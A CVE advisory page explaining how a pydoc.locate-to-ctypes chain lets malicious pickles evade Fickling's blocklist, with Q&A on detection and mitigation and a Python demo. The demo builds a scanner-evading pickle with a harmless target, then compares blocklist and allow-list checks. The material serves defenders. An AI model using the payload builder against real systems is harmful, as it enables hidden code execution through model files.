CVE-2026-22608
Remote Code Execution via Unblocked Modules in Fickling

Publication date: 2026-01-10

Last updated on: 2026-01-10

Assigner: GitHub, Inc.

Description
Fickling is a Python pickle decompiler and static analyzer. Prior to version 0.1.7, neither the ctypes module nor the pydoc module is explicitly blocked. Other existing pickle-scanning tools (such as picklescan) do not block pydoc.locate either. Chaining the two yields remote code execution while the scanner still reports the file as LIKELY_SAFE. This issue has been patched in version 0.1.7.
Meta Information
Published: 2026-01-10
Last Modified: 2026-01-10
Generated: 2026-05-07
AI Q&A: 2026-01-11
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (2 associated CPEs)
Vendor        Product    Version / Range
trailofbits   fickling   all versions before 0.1.7 (0.1.7 excluded)
trailofbits   fickling   0.1.7
CWE ID    Description
CWE-502   Deserialization of Untrusted Data: the product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
CWE-184   Incomplete List of Disallowed Inputs: the product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The provided resources do not contain information regarding the impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.


Can you explain this vulnerability to me?

Fickling is a Python pickle decompiler and static analyzer. Before version 0.1.7 it did not explicitly block the ctypes and pydoc modules, so a pickle whose only import is pydoc.locate can resolve a ctypes callable at load time by passing the callable's dotted name as a string argument. The scanner sees a pydoc import and a string, not a ctypes import, and reports the file as LIKELY_SAFE. The cited proof of concept resolves ctypes.windll.kernel32.WinExec this way and calls it to launch the Windows calculator. Other scanners, including picklescan, also do not block pydoc.locate, so the same payload passes them. Version 0.1.7 patches the issue by explicitly blocking these modules. [2, 3]


How can this vulnerability impact me?

A crafted pickle that a vulnerable Fickling (prior to 0.1.7) rates LIKELY_SAFE executes arbitrary code on whatever system later unpickles it. The exposure is therefore a false negative: any workflow that gates the loading of untrusted pickles (for example machine-learning model files) on the scanner's verdict will load the payload. The result is code execution with the privileges of the loading process, which can mean loss of integrity, unauthorized actions and, depending on those privileges, full system compromise. [2]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

First check the installed version: pip show fickling prints it, and anything below 0.1.7 is affected. Fickling 0.1.7 or later explicitly blocks imports from the ctypes and pydoc modules, so running its static analysis on a pickle file flags unsafe imports such as 'from ctypes import CDLL' and 'from pydoc import locate' and rates the payload above LIKELY_SAFE. The project's test cases exercise this by constructing pickle payloads that attempt to execute code via these modules. The sources give no further specific commands. [3, 2]


What immediate steps should I take to mitigate this vulnerability?

Upgrade Fickling to version 0.1.7 or later, where the ctypes and pydoc modules are explicitly blocked during pickle analysis. Update any other pickle-scanning tools in use to versions that include equivalent fixes, since picklescan also did not block pydoc.locate, to avoid the same false negatives. Because this is an incomplete-blocklist weakness (CWE-184), a LIKELY_SAFE verdict from any scanner should be treated as a filter that reduces risk, not as proof that a pickle from an untrusted source is safe to load. [1, 3]
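The following is an added example and not code from fickling, picklescan or the advisory. It illustrates the three answers above in one runnable piece: it hand-assembles a pickle whose only import is pydoc.locate and which calls whatever that resolves (the explanation), lists the stream's imports the way a blocklist scanner would and shows that a blocklist without pydoc reports nothing while one with pydoc flags it (the detection), and contrasts that with a deny-by-default allow-list unpickler that refuses the payload outright (the mitigation caveat). Assumptions for the demo: the target is the harmless ctypes.c_int rather than the ctypes callable the page describes, the allow-list contents are illustrative, and STACK_GLOBAL handling uses the two most recent string pushes rather than a full memo model.

```python
"""Added example: pydoc.locate -> ctypes chain, blocklist scan, allow-list loader.
Not code from fickling, picklescan or the advisory. The harmless target
ctypes.c_int and the allow-list contents are assumptions for the demo."""
import io
import pickle
import pickletools
import struct


def _push(value):
    """Opcodes that push one argument (int 0-255 or str) on the pickle stack."""
    if isinstance(value, int) and 0 <= value <= 255:
        return pickle.BININT1 + bytes([value])
    if isinstance(value, str):
        encoded = value.encode("utf-8")
        return pickle.BINUNICODE + struct.pack("<I", len(encoded)) + encoded
    raise TypeError("demo supports only small ints and str")


def build_locate_chain(target, args=()):
    """Hand-assemble a protocol-2 pickle equivalent to pydoc.locate(target)(*args).

    The only GLOBAL opcode names pydoc.locate; the real target travels as a
    plain string argument, which a static import scan sees as data.
    """
    out = [pickle.PROTO + b"\x02",
           pickle.GLOBAL + b"pydoc\nlocate\n",            # push pydoc.locate
           pickle.MARK + _push(target) + pickle.TUPLE,    # push (target,)
           pickle.REDUCE,                                 # locate(target)
           pickle.MARK]
    out.extend(_push(a) for a in args)
    out.append(pickle.TUPLE + pickle.REDUCE)              # resolved(*args)
    out.append(pickle.STOP)
    return b"".join(out)


def imported_globals(data):
    """Static list of (module, name) pairs the stream imports.

    GLOBAL/INST carry the names inline; STACK_GLOBAL takes the two most
    recent string pushes (a simplification: memo indirection is ignored).
    """
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str) and op.name.endswith(("UNICODE", "STRING")):
            strings.append(arg)
    return found


def flagged_imports(data, blocked_modules):
    """Blocklist check: imports whose top-level package is blocked."""
    return [(m, n) for m, n in imported_globals(data)
            if m.split(".")[0] in blocked_modules]


class AllowlistUnpickler(pickle.Unpickler):
    """Deny-by-default alternative to a blocklist: only listed globals resolve,
    so an unanticipated module such as pydoc cannot slip through."""
    ALLOWED = {("builtins", "set"), ("collections", "OrderedDict")}  # assumed for the demo

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def allowlist_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def demo():
    """Run the chain against a plain loader, two blocklists and the allow-list."""
    payload = build_locate_chain("ctypes.c_int", (42,))   # harmless stand-in target
    try:
        allowlist_loads(payload)
        refused = False
    except pickle.UnpicklingError:
        refused = True
    return {
        "imports": imported_globals(payload),                       # only pydoc.locate
        "ctypes_only_blocklist": flagged_imports(payload, {"ctypes"}),
        "ctypes_and_pydoc_blocklist": flagged_imports(payload, {"ctypes", "pydoc"}),
        "plain_loads_value": pickle.loads(payload).value,           # the chain executes
        "allowlist_refused": refused,
        "allowlist_accepts_plain_data": allowlist_loads(pickle.dumps({"ok": [1, 2]})),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point to take from the output is that the import listing contains a single pydoc.locate entry: the ctypes target is never an import, so a scanner that blocks ctypes but not pydoc has nothing to match, while the allow-list loader refuses the stream at the first GLOBAL regardless of which module it names.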

